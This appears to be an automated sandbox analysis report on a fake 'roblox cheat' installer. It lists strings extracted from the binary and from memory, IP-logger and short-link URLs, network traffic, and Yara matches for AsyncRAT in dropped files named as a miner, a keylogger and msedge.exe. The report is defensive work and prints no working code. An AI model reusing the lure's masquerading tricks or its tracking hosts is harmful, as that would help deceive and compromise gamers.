            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/_1J
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.11rbr
            Source: chromecache_137.12.drString found in binary or memory: https://2no.co/
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, coin.bat.3.drString found in binary or memory: https://2no.co/24RXx6
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/24RXx6H
            Source: chromecache_137.12.drString found in binary or memory: https://2no.co/redirect-2
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/redirect/handshake.png
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://client-telemetry.roblox.com
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com3
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.cominatorey
            Source: robloxPX1instaler_48CB5.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerblox
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerocal
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerons
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerp
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64p
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings
            Source: robloxPX1instaler_48CB5.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: robloxPX1instaler_48CB5.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper3
            Source: robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperLMEMX
            Source: robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate
            Source: robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloadsr
            Source: chromecache_137.12.drString found in binary or memory: https://counter.yadro.ru/hit?
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbees
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/rules/
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: https://s3.amazonaws.com/
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: https://setup.rbxcdn.com
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.comw
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60764
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.9:60764 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: BitCoin_miner.exe.3.dr, XLogger.cs.Net Code: KeyboardLayout
            Source: msedge.exe.3.dr, XLogger.cs.Net Code: KeyboardLayout

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75454C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF75454C2F0
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_01A5164C0_2_01A5164C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545707543_2_00007FF754570754
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75456B1903_2_00007FF75456B190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545634843_2_00007FF754563484
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455A4AC3_2_00007FF75455A4AC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75456CE883_2_00007FF75456CE88
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754545E243_2_00007FF754545E24
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754561F203_2_00007FF754561F20
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545549283_2_00007FF754554928
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75454F9303_2_00007FF75454F930
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545825503_2_00007FF754582550
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455B5343_2_00007FF75455B534
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545476C03_2_00007FF7545476C0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75457C8383_2_00007FF75457C838
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545448403_2_00007FF754544840
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455F1803_2_00007FF75455F180
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545621D03_2_00007FF7545621D0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545472883_2_00007FF754547288
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455126C3_2_00007FF75455126C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75454A3103_2_00007FF75454A310
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75454C2F03_2_00007FF75454C2F0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545653F03_2_00007FF7545653F0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754562D583_2_00007FF754562D58
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545707543_2_00007FF754570754
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754568DF43_2_00007FF754568DF4
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455AF183_2_00007FF75455AF18
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545820803_2_00007FF754582080
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545639643_2_00007FF754563964
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455C96C3_2_00007FF75455C96C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545789A03_2_00007FF7545789A0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75457FA943_2_00007FF75457FA94
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754551A483_2_00007FF754551A48
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754585AF83_2_00007FF754585AF8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754541AA43_2_00007FF754541AA4
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754562AB03_2_00007FF754562AB0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75455BB903_2_00007FF75455BB90
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754555B603_2_00007FF754555B60
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754564B983_2_00007FF754564B98
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754578C1C3_2_00007FF754578C1C
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ msedge.exe E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Keyloger.exe 8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
            Source: roblox cheat.exe, 00000000.00000000.1340236408.0000000000F24000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1348520885.000000000153E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000000.1339003894.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1349842521.00000000047C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exeBinary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exeBinary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
